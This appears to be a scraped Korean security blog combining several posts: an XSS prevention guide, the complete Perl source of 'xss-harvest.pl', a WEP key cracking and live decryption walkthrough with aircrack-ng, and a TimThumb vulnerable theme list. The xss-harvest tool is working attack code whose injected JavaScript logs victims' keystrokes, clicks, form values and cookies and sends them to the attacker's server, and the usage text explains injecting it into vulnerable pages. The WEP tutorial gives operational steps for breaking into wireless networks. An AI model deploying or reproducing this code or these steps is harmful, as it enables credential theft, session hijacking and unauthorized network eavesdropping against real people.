In the majority of cases, remote code insertion attacks are likely to be through the submission of user data in HTML forms. One prevention step is to ensure that form submission is only ever done through HTTP POST requests. Allowing HTTP GET request submissions will allow potentially attackers to craft distributable URL’s containing the offending code.
When coding the server-side application, it is extremely important to ensure that the client-side data can only be received through HTTP POST variables. Most web hosting applications will indicate the variable delivery method.

HTTP POST not GET
Forcing the use of HTTP POST over GET is a simple process and easy to implement.
Advantages:
  • Almost always removes the threat of URL based code insertion attacks.
 Disadvantages:
  • Application users may not be able to save URLs to their favourites for quick access to the application component.

Cookie Inspection

Many applications utilise cookies for managing the state of the communication, and local storage of information relevant to the user. Application developers must ensure that all cookie information is thoroughly checked and filtered before insertion into the HTML documents. Attackers modifying persistent cookies can also make their attacks persistent.

URL Session Identifier

In some circumstances, the use of a unique session identifier for each valid user can be used to prevent remote exploitation of URL based code insertion attacks.
As a user arrives at the web site, they are automatically allocated a unique session ID. This session ID can ONLY be obtained from one page on the site (usually the start/home page). Should a visitor try to access any other page within the site without a valid session ID, they are automatically redirected to the start page and issued one.
Should an attacker discover a CSS flaw with one application component, any crafted exploit URL will have to contain a valid session ID. By rigorously controlling the session ID timeout, the attacker will not be able make use of the flaw (other than affecting the attacker locally) outside of this period.
For additional security, the session ID could also be made in include a hashed version (or checksum) of the client browser’s IP address.

URL Session Identifier
URL session identifiers are often visible as:
http://trusted.org/app.jsp?session=h3uf8309ai9.830988
Advantages:
  • Likely to stop all long term insertion attacks.
  • With the addition of IP address information, session ID’s implemented this way will stop all URL based code insertion attacks.

    .

 Disadvantages:
  • It is likely that the session ID will be allocated, and used, over HTTP. This session ID will thus be sent in the clear and will display in most logging systems (e.g. firewalls, proxies etc.). Developers must ensure that a different session ID is allocated and used during secure transactions.
  • This security measure can still be defeated by man-in-the-middle type attacks.

Character Sets

The success of code injection attacks relies heavily on the use of non a-Z characters. Some small measure of security can be gained by ensuring that an appropriate data is filtered using an appropriate character set.

Character Sets
A popular character set is ISO 8859-1, which was the default in early versions of HTML and HTTP.
Ensure all content pages include the following:
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
Advantages:
  • Character submission in limited by the client web browser itself.
  • Can potentially reduce the amount of client-side code required to check user-supplied text. Thus it may also reduce the total size of the HTML content – making for faster download times.
Disadvantages:
  • Can be easily bypassed.
  • Will have an effect on character localisation issues.

Dangerous Content

Certain characters are of special significance when inserted into web pages or URL content. These characters are based upon the HTML specifications, context and browser interpretation. If input to the application (or web site) is not correctly validated, the following problems may occur:

  • Session information from client cookies may be set and read,
  • User input could be intercepted,
  • Data integrity can be compromised,
  • Foreign scripting components can be executed by the client browser in the context of the trusted source.
Character Significance
< The less-than character introduces a HTML tag.
> The greater-than character is sometimes interpreted by client browsers as the end of a HTML tag, and assumes that the author of the page omitted an opening < in error.
The double quote character is often interpreted as the end of an attribute character.
% The percentage character is frequently used for encoding characters, such as their Unicode representation
& The ampersand introduces a character entity. It is possible to combine the double quote and ampersand characters (“& “ extravalue”) to combine character entities within a HTML tag. Within a URL, the & introduces a character entity. Also, often used by UNIX based operating systems for command execution.
' HTML tag attribute values can be enclosed within single quotes.
SPACE Although most good developers prefer to quote attribute values, it is possible to omit these entirely as long as white-space characters are introduced. The SPACE character can be used as white-space. When used within URL information, the SPACE character is interpreted as the end of a URL.
TAB Following the same white-space principals as the SPACE character, TAB may also be used. When used within URL information, the TAB character is interpreted as the end of a URL.
; | ! Semicolons, Pipes and exclamation characters for additional command execution - The dash (or minus sign) can be used in database queries, and the creation of negative numbers.
/ \ The forward-slash and back-slash are often used for faking paths and queries.
( ) { } [ ] Brackets, curly brackets and square brackets are often used as script, program or regex expressions.
* Often used in database queries for “all”
? $ @ : Question mark, Dollar, At and Colon characters are often used as script or programming markers.
Hex Version The hex value of a character may be used, often done for non-printable characters. Such as:
x00 Null bytes for truncating strings
x04 EOF for faking the end of files
x08 Backspace x0a New Line for extra command execution
x0d New Line for extra command execution
x1b Escape character for breaking out of procedures
x20 Spaces for faking URLs and other names
x7f Delete
Non-ASCII Within a URL, non-ASCII characters (characters values above 128 in the ISO8859-1 encoding) are not allowed.
   

When dealing with potentially dangerous user supplied data, organisation may approach from three different angles:

  • Encode output based upon input parameters.
  • Filter input parameters for special characters.
  • Filter output based upon input parameters for special characters.

Applying the appropriate solution efficiently is dependant upon the language used to code the server-side application.

Depending upon the application, and the particular phase of operation, it may be necessary to use different techniques to handle the special characters. In most instances input or output filtering will be sufficient. However, if particular client data submissions are likely to contain special characters (e.g. a complex database search query), it may be necessary to encode the resultant data for presentation back to the client.

Encode output based upon input parameters

In this method, any non-validated user data is always encoded to the appropriate HTML characters as it is written back to the user. For instance the character “<“ would be encoded as “&lt” and, although appearing to the user as the less-than character, would not be interpreted by the client application as the start of a HTML tag.

If a web page uses the UFT-7 character encoding, there are several different strings which will act as a ‘<’ character and start an HTML tag; all of these strings start with a ‘+’. It is also important that the use of the”%” encoding character be carefully monitored, as it can be used to escape-encode or Unicode special characters that will be correctly interpreted the client web browser. There are many methods of encoding text and special characters. A detailed analysis can be found in the earlier paper, “URL Encoded Attacks”.

Encode output based upon input parameters
Microsoft Active Server Pages

<%
var BaseURL = http://www.mysite.com/search2.asp?searchagain=;Response.write
("<a href=\"" + BaseUrl + Server.URLEncode(Request.QueryString("SearchString")) +
"\">click-me</a>");
%>
<% Response.Write("Hello visitor <I>" +
Server.HTMLEncode(Request.Form("UserName")) +
"</I>"); %>

With Microsoft’s ASP, the HTMLEncode call will automatically prevent any script in it from being executed.

Filter input parameters for special characters.

Input filtering works by removing some or all special characters from user supplied data as it reaches the server-side application components. Although it is possible to implement client-side input filtering, this should never be relied upon as it is often a trivial exercise for an attacker to bypass it. Even if implemented at the client-side, the server-side processes should carry out the same input filtering processes.

The recommended method of implementing input filtering is to only select from the set of characters that is known to be safe rather than excluding the named special characters. This method is referred to as Positive filtering, and by only selecting the characters that are acceptable, it will help to reduce the ability to exploit other yet unknown vulnerabilities.

For example, a form field that is expecting a person's age can be limited to the set of digits 0 through 9. There is no reason for this age element to accept any letters or other special characters.

Filter output based upon input parameters for special characters

Output filtering functions similarly to Input filtering, except that special characters are filtered from the data at the server-side application before being sent to the client web browser. This technique should be used when data is retrieved from databases or storage formats, particularly when there is a probability that non-filtered content could have been added by other applications or system processes.

Special care should be taken when using Output filtering. If the application outputs HTML content, vigilance is required to ensure that special character filtering is restricted to data that has been previously supplied by a user and stored in a database. Filtering the special characters “<“ and “>“ too early in the process is likely to render the client HTML document useless.


[참조] http://www.technicalinfo.net/papers/CSS.html
저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Fake Facebook friend request email leads to malware  (0) 2011.09.05
XSSed project  (0) 2011.08.31
XSS-Harvest / xss-harvest.pl  (0) 2011.08.29
Adobe RoboHelp 9 DOM Cross Site Scripting  (0) 2011.08.16
Mailto: Crash (may crash you)  (0) 2011.08.08
Posted by bitfox
l

XSS-Harvest / xss-harvest.pl

위험한_친구들/십자군_XSS 2011. 8. 29. 22:36
드디어 자동화 툴도 나왔군요. 작년에 제가 XSS를 통해 키로거 스크립트를 공개했었는데..
펄로 멋진 넘(?)을 만들어 냈네요. ㅎ 동영상은 유튜브에 있습니다. 넘 자세하여 못 올리겠음. ^^;


XSS-Harvest.pl source

#!/usr/bin/perl
#    ORIGINAL AUTHOR CAN BE FOUND AT http://0x90.co.uk
#    VERSION 0.2

#    Usage: ./xss-harvest.pl -l [-r redresspage] [-p listen port]

#    Written by nopslider nop@0x90.co.uk 11/07/2011

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

package XSSHarvest;

use warnings;
use strict;

use HTTP::Server::Simple::CGI;
use base qw(HTTP::Server::Simple::CGI);
use Digest::MD5 qw(md5_hex);
use Fcntl qw(:flock);
use Time::Local;
use Fcntl qw(:flock SEEK_END);
use Term::ANSIColor;
use Getopt::Std;

# Command line options
my %options;

if (! getopts('p:r:l', \%options)) {
usage();
exit;
}
# If no -l specified, show options
if (! $options{l} == 1) {
usage();
exit;
}

# The client-side javascript - listed at the bottom of this file
my @infection = <DATA>;

# Dispatcher functions
my %dispatch = (
     '/i' => \&infect,
     '/k' => \&key,
     '/p' => \&page,
     '/d' => \&data,
     '/'  => \&home
);

# Handle incoming requests
sub handle_request {
     my $self = shift;
     my $cgi  = shift;
   
     my $path = $cgi->path_info();
     my $handler = $dispatch{$path};
 
     if (ref($handler) eq "CODE") {
         print "HTTP/1.0 200 OK\r\n";
         $handler->($cgi);
         
     } else {
         print "HTTP/1.0 404 Not found\r\n";
         print $cgi->header,
               $cgi->start_html('Not found'),
               $cgi->h1('Not found'),
               $cgi->end_html;
     }
}
 
# Return the infection script
sub infect {
      my $cgi  = shift;  
      return if !ref $cgi;
     
my $ip = $cgi->remote_addr();
my $uid;
my $fh;
my $ua = $cgi->user_agent();

if ($uid = $cgi->cookie('x55')) {
$fh = getFile($uid);
print STDERR "\n[INFO] Returning vicim ($uid) - $ip\n";
print $cgi->header(-type=>"text/javascript");
}
else {
$uid = md5_hex(time . "-$ip");
print STDERR "\n[INFO] New victim incoming! ($uid) - $ip\n";
$fh = getFile($uid);

my $setcookie = $cgi->cookie(-name=>'x55',
                             -value=>$uid,
                             -expires=>'+1y');
print $cgi->header(-cookie=>$setcookie, -type=>"text/javascript");
}

lock($fh);
print $fh "\n************************************\n";
print $fh "[INFECTION] " . localtime() . "\n";
print $fh "[IP] $ip\n";
print $fh "[UID] $uid\n";
print $fh "[UA] $ua\n";
print $fh "************************************\n";
unlock($fh);

# Return infection script
getInfection($cgi->url(-base));

print STDERR "\n[INFO] Delivered infection payload to ($uid) - $ip\n";
}

# Accept a key
sub key {
      my $cgi  = shift;  
return if !ref $cgi;

my $uid = $cgi->cookie('x55') || die "\n[WARN] Key received without cookie\n";

print STDERR ".";

my $key = $cgi->param('k');
my $fh = getFile($uid);

lock($fh);
print $fh $key;
unlock($fh);

print $cgi->header(-Cache_Control=>'no-store', -type=>'text/javascript', -Pragma=>'no-cache', -Expires=>'-1');
print "//done";
}

# Accept a page load
sub page {
      my $cgi  = shift;  
      return if !ref $cgi;
     
my $uid = $cgi->cookie('x55') || die "\n[WARN] Page received without cookie\n";
      my $cookie = $cgi->param('c') || "";
      my $url = $cgi->param('p') || "";

print STDERR "\n[INFO] New page loaded by victim ($uid) - $url\n";

my $fh = getFile($uid);

lock($fh);
print $fh "\n************************************\n";
print $fh "[PAGE LOADED] " . localtime() . "\n";
print $fh "[URL] $url\n";
print $fh "[COOKIES] \n$cookie\n" unless ($cookie eq "");
print $fh "************************************\n";
unlock($fh);

print $cgi->header(-type=>'text/javascript');
print "//done";
}

# Accept arbitrary data
sub data {
      my $cgi  = shift;  
      return if !ref $cgi;
     
my $uid = $cgi->cookie('x55') || die "\n[WARN] Data received without cookie\n";
my $data = $cgi->param('d') || "";

print STDERR "\n[INFO] Data communication received. ($uid)\n";

my $fh = getFile($uid);

lock($fh);
print $fh "\n************************************\n";
print $fh "[DATA] " . localtime() . "\n";
print $fh $data;
print $fh "\n************************************\n";
unlock($fh);
print $cgi->header(-type=>'text/javascript');
print "//done";
}
 
# Invalid request
sub home {
      my $cgi  = shift;
      return if !ref $cgi;

print STDERR "[WARN] Direct request to server.\n";
print $cgi->header();
}

# Return file handle for victim
sub getFile {
my $uid = shift;

if ($uid !~ /^[0-9a-z]{32}$/) {
die "\n[ERROR] Invalid UID. Someone may be tampering with parameters.\n";
}
else {
my $file = "./history/$uid.txt";

# Check file exists
if (-e "$file") {
open(FH,">>$file") || die("\n[ERROR] Cannot Open file $file.\n");
}
else {
print STDERR "\n[INFO] Creating new history file $file.\n";
open(FH,">>$file") || die("\n[ERROR] Cannot create file $file.\n");
}
# Return file handle
return *FH;
}
}

# flock a file
sub lock {
        my ($fh) = @_;
        flock($fh, LOCK_EX) or die "[ERROR] Cannot lock history file - $!\n";
        # and, in case someone appended while we were waiting...
        seek($fh, 0, SEEK_END) or die "[ERROR] Cannot seek - $!\n";
}

# release a file
sub unlock {
        my ($fh) = @_;
        flock($fh, LOCK_UN) or die "[ERROR] Cannot unlock file - $!\n";
}

# populate client-side javascript variables
sub getInfection {
my $ip = shift;

my $redresspage = $options{r};

# Prepare the infection
print "var destination = '$ip';\n";
if (defined($redresspage)) {
  print "var redresspage = '$redresspage';\n";
}
else {
print "var redresspage = undefined;\n";
}

foreach (@infection) {
print $_;
}
}

# Usage information
sub usage {
print "\nUsage:\n\t$0 -l [-p Port] [-r Redress the victims browser]\n";

print "\nStart with (-l) and point your victims at http://<YOUR INTERNET FACING IP>/i to be \"infected\".\n";
print "\te.g. inject something like this into a vulnerable page - <script src='http://<YOURSERVERIP>/i'></script>\n\n";
print "Optionally run $0 with the (-r) parameter to redress the victims browser to ";
print "a different page on the same site (such as a login form) after successful infection.\n";
print "\te.g. $0 -l -r http://<TARGETSITE>/login.php \n\n";
print "For persistent XSS (infection persists across subsequent pages on the same domain), ";
print "you must use the redress feature, even if you intend to display the original vulnerable page.\n\n";
}

# Startup server code....
my $port = $options{p} || 80;
 
my $server = XSSHarvest->new($port);
sub net_server { 'Net::Server::PreFork' };

print color 'bold';
print "\n************************";
print "\n*  XSS-Harvest Server  *\n";
print "************************";
print color 'reset';
print "\n\n[INFO] Starting server....\n";

# Check history directory exists
if (! -d './history') {
print "[INFO] No history directory found, creating...\n";
mkdir 'history' || die "[ERROR] Cannot create history directory\n";
}
else {
print "[INFO] History directory found.\n";
}

$server->run();

__DATA__
var body = document.getElementsByTagName("body")[0];

if (redresspage !== undefined && ! document.getElementById("redressFrame")) {
    var se1 = document.createElement('div');
    se1.setAttribute('id', 'redressDiv');
    se1.setAttribute('style', 'height:100%;width:100%;position:absolute;top:0;right:0;left:0;bottom:0;margin:0;padding:0;background-color:white;');
    var inner = "<iframe onload='sendPage()' frameBorder='0' id='redressFrame' width='100%' height='100%' src='" + redresspage + "'></iframe>";
    se1.innerHTML = inner;
    body.appendChild(se1);
} else {
addListeners(this.body);
var pageurl = escape(location.href);
var cookies = escape(document.cookie);
var referer = escape(document.referrer);
var initalinfection = destination + '/p?p=' + pageurl + '&c=' + cookies + '&r=' + referer;
addScript(initalinfection);
}

function addListeners(body) {
if (body.addEventListener) {
body.addEventListener("keypress",keypressAction,false);
body.addEventListener("keydown",keydownAction,false);
body.addEventListener("click",click,false);
} else if (body.attachEvent){
body.attachEvent("onkeypress", keypressAction);
body.attachEvent("onkeydown", keydownAction);
body.attachEvent("onclick", click);
} else {
var error = escape("[ERROR] Cannot add event listeners to page");
addScript(destination + '/d?d=' + error);
}
}

function click(e) {
var doc;
if (frame = document.getElementById("redressFrame")) {
doc = frame.contentWindow.document || frame.contentDocument.document;
}
else {
doc = document;
}
var X = e.pageX || (e.clientX + doc.body.scrollLeft);
var Y = e.pageY || (e.clientY + doc.body.scrollTop);
var data = "[CLICK RECEIVED]\n\t[COORDS] "+X+","+Y;
var element = doc.activeElement;
var name = element.name || "";
var value = element.value || "";
var text = element.text || "";
var tag = element.tagName || "";
if (tag != "") {
data = data + "\n\t[TAGNAME]"+tag;
}
if (name != "") {
data = data + "\n\t[NAME]"+name;
}
if (value != "") {
data = data + "\n\t[VALUE]"+value;
}
if (text != "") {
data = data + "\n\t[TEXT]"+text;
}

if (element.selectedIndex) {
data = data + "\n\t[SELECTED]"+ element.options[element.selectedIndex].text;
}

data = escape(data);
addScript(destination + '/d?d=' + data);
}

function sendKey(key) {
var randomnumber=Math.floor(Math.random()*1001);
addScript(destination + '/k?k=' + key + '&t=' + randomnumber);
}

function keypressAction(e) {
var key;
if (e.which == null)
      key = String.fromCharCode(e.keyCode);
   else if (e.which != 0 && e.charCode != 0)
     key = String.fromCharCode(e.which);
   else key = "<specialkey>";
sendKey(escape(key));
}

function keydownAction(e) {
var key;
      key = e.keyCode || e.which;
if (key == 9) sendKey(escape("<TAB>"));
if (key == 13) sendKey(escape("<ENTER>"));
if (key == 37) sendKey(escape("<LEFT ARROW>"));
if (key == 38) sendKey(escape("<UP ARROW>"));
if (key == 39) sendKey(escape("<RIGHT ARROW>"));
if (key == 40) sendKey(escape("<DOWN ARROW>"));
if (key == 8) sendKey(escape("<BACK SPACE>"));
if (key == 46) sendKey(escape("<DELETE>"));
}

function sendPage() {
var frame = document.getElementById("redressFrame");
var doc =  frame.contentWindow.document || frame.contentDocument.document;
    if (doc.document) {
       doc = doc.document;
       }
document.title = doc.title;
var body = doc.getElementsByTagName("body")[0];
addListeners(body);
var url = escape(doc.location.href);
var cookies = escape(doc.cookie);
var pageurl = destination + '/p?p=' + url + '&c=' + cookies;
addScript(pageurl);
}

function addScript(url) {
    var scr = document.createElement("script");
    scr.setAttribute("language", "JavaScript");
    scr.setAttribute("src", url);
    document.getElementsByTagName("body")[0].appendChild(scr);
}

Notice: 악의적인 사용시 사용자 본인의 책임을 명시합니다.

[출처] http://www.0x90.co.uk/2011/07/harvesting-cross-site-scripting-xss.html
저작자표시 비영리 변경금지

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSSed project  (0) 2011.08.31
HTML Code Injection and Cross-site scripting  (0) 2011.08.31
Adobe RoboHelp 9 DOM Cross Site Scripting  (0) 2011.08.16
Mailto: Crash (may crash you)  (0) 2011.08.08
XSS BASIC SITE  (0) 2011.08.08
Posted by bitfox
l

How to crack a WEP key and decrypt live traffic

위험한_친구들/그림자_WIFI 2011. 8. 20. 23:07
[출처] http://www.netexpertise.eu/en/linux/crack-wep-key-and-decrypt-live-traffic.html

Cracking a WEP key is extremely easy and is a matter of a few seconds. Truth? Pretty much… We are going to decrypt traffic in real time as well without even needing to connect to the wireless access point.
 
All steps will be run under root super-user as interfaces state needs to be changed.
 

To Start with

Download and install aircrack-ng. It’s available on most Linux distributions in a package format.
On Debian, run

apt-get install aircrack-ng

 
Aircrack provides tools to capture packets, crack the WEP key, and decrypt live traffic.
 
We’ll run tests with a Linksys PCMCIA wifi card. A simple ifconfig displays the card’s network stats that tells us it’s been detected.

root@crack_WEP:~# ifconfig
lo        Interface doesn't support scanning.

wlan0     Link encap:Ethernet  HWaddr 00:1a:70:6b:37:4e
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3742 (3.7 KB)  TX bytes:10773 (10.7 KB)

 

Capture packets

The interface needs to be switched to monitor mode.

root@crack_WEP:~# airmon-ng
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]

 
Airmon has detected interface wlan0. It could be a different name of course such as ath0 for instance.

root@crack_WEP:~# airmon-ng stop wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode disabled)

root@crack_WEP:~# airmon-ng start wlan0
Interface	Chipset		Driver
wlan0		Broadcom 43xx	b43 - [phy0]
				(monitor mode enabled on mon0)

 
Running iwconfig shows mon0 has been added in addition to the original interface wlan0:

root@crack_WEP:~# iwconfig
wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=27 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

 
We can now scan for available networks

root@crack_WEP:~# airodump-ng mon0
 CH 10 ][ Elapsed: 4 s ][ 2009-08-08 18:01
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  197        4        0    0   1  11  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 
Scan results show we've got an access point emitting on channel 1 with WEP encryption and which has mac address 00:A0:C5:FF:84:72.
The target now defined, we need to capture air packets.

root@crack_WEP:~# airodump-ng --channel 1 --bssid 00:A0:C5:FF:84:72 --write temp wlan0

 CH  1 ][ Elapsed: 31 mins ][ 2009-05-02 21:52
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:A0:C5:FF:84:72  205  10     6058    24496    0   1  54  WEP  WEP         private
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
 00:A0:C5:FF:84:72  00:18:4D:76:30:EB  188  54-54     0    24795

 
Packets are captured in .cap files with the temp suffix.
Cracking techniques getting more efficient, there are good chances to crack a key with no more than 40000 packets with recent algorithms. Capturing time varies with the amount of traffic on the air link.
 

Crack the WEP key

It's now time to crack the WEP key:

root@crack_WEP:~# aircrack-ng -z -b 00:A0:C5:FF:84:72 temp.cap-0*.cap 

                                         Aircrack-ng 1.0 rc1

                         [00:00:22] Tested 240228 keys (got 41742 IVs)

   KB    depth   byte(vote)
    0    0/  1   B9(58880) A0(50688) 12(50176) F5(49920) 9E(48896) CD(48640)
    1    0/  1   19(54784) E8(52480) FA(52480) 4B(51456) 79(51456) DD(49664)
    2    0/  1   31(59648) EA(53504) 40(50688) 0A(50432) 88(50432) 0E(50176)
    3    0/  1   8C(60416) 05(49152) 56(49152) 23(48640) 52(48384) 03(48128)
    4    0/  1   B2(59136) AE(49664) 78(49152) FE(49152) 8B(48384) 9C(47616)
    5    0/  1   61(53504) E6(50688) FF(50176) 13(49664) 23(49408) C7(49408)
    6    0/  1   DD(56320) C4(51968) 90(50688) 0C(50176) CF(49920) CE(49152)
    7    0/  1   4E(53248) E6(51968) 7D(49152) 0B(48896) 90(48896) 06(48640)
    8    0/  1   FB(52224) C1(49664) E9(48128) 3D(47616) F0(47360) EB(47104)
    9    0/  1   0B(54784) BC(51712) 52(50432) 54(49920) F5(49920) CA(48896)
   10    0/  1   E6(50944) 1C(49920) 5F(49408) 1F(49152) 0A(48896) 83(48896)
   11    2/  1   FF(49664) 17(48384) 94(48128) 27(47872) 23(47616) B2(47616)
   12    0/  4   91(50452) A4(50360) 77(50156) 78(49540) FF(49476) 70(48788) 

             KEY FOUND! [ B9:19:31:8C:B2:61:DD:4E:FB:0B:AA:62:99 ]
	Decrypted correctly: 100%

 
That’s right, the key was cracked in 22 seconds!
 

Decrypt the traffic

It is possible to capture the traffic in .cap files as above, decrypt it in a second file before sending it to the tcpdump command for instance:

root@crack_WEP:~# airdecap-ng -w b919318cb261dd4efb0baa6299 temp-01.cap
Total number of packets read         22072
Total number of WEP data packets      6245
Total number of WPA data packets         0
Number of plaintext data packets         3
Number of decrypted WEP  packets      6245
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets         0

root@crack_WEP:~# tcpdump -r temp-01-dec.cap -i wlan

 
But it is also possible to decrypt live traffic in real time sending it to a virtual interface at0 on which we can listen as with any real interface. Airtun-ng provided in Aircrack package has the ability to do so.

root@crack_WEP:~# airtun-ng -a 00:A0:C5:FF:84:72 -w b919318cb261dd4efb0baa6299 mon0
created tap interface at0
WEP encryption specified. Sending and receiving frames through mon0.
FromDS bit set in all frames.

 
From another shell:

crack_WEP:~# tcpdump -i at0

 

Conclusion

It is indeed very easy to crack a WEP key and listen to the traffic without associating to the access point hence without being detected. Pay attention to use at least WPA with non-dictionnary based passwords.

저작자표시 비영리 변경금지

'위험한_친구들 > 그림자_WIFI' 카테고리의 다른 글

WLAN Security  (0) 2011.09.15
Book : Backtrack 5 Wireless Penetration Testing by Vivek Ramachandran  (0) 2011.09.15
[spanish] Asaltando redes wifi  (0) 2011.08.16
Tutorial: How to Crack WPA/WPA2  (0) 2011.08.10
WIFI와 스마트폰 (RogueAP)  (0) 2010.10.28
Posted by bitfox
l

Userland Hooking in Windows

위험한_친구들/친절한_Windows군 2011. 8. 17. 09:27

예제 코드까지 제시하면서 보여주는 센스~ :-)
winapi를 정복하신 분이라면 이 전율을 느끼실 수 있습니다.


[출처] http://www.exploit-db.com

저작자표시 비영리 변경금지

'위험한_친구들 > 친절한_Windows군' 카테고리의 다른 글

Microsoft IIS Tilde Character Short File/Folder Name Disclosure  (0) 2012.07.18
윈도우 RDP (Remote Desktop Protocol) 활성화  (0) 2012.02.28
[0-day]Vulnerability in Windows Help and Support Center Could Allow Remote Code Execution  (0) 2010.06.21
Posted by bitfox
l

Timthumb Security Vulnerability – List of Themes

위험한_친구들/코디_Editor 2011. 8. 16. 14:41
Timthumb에 대한 제로데이 취약점이 8월 초 공개되었다.
국내보다는 해외 사이트에서 많이 사용되고 있는 에디터의 기능으로 이미지 파일안에 코드를 입력하여 원격 제어가 가능하다.

위 사진과 같이 3천 6백만번의 다운로드가 이루어 졌을 많큼 많은 곳에서 사용중임을 추정할 수 있다.

---
sucuri.net에서 공개한 확인해야 하는 timthumb 리스트안에 관리하는 웹서버의 디렉터리는 안전한지 확인해 보자. 만일 존재한다면 기능을 제한 하거나 보안 패치된 에디터로 업데이트 하자.


[출처] http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.

Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb.

If you use any of the following themes please check to see if the script is present, and make sure it is updated:

8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
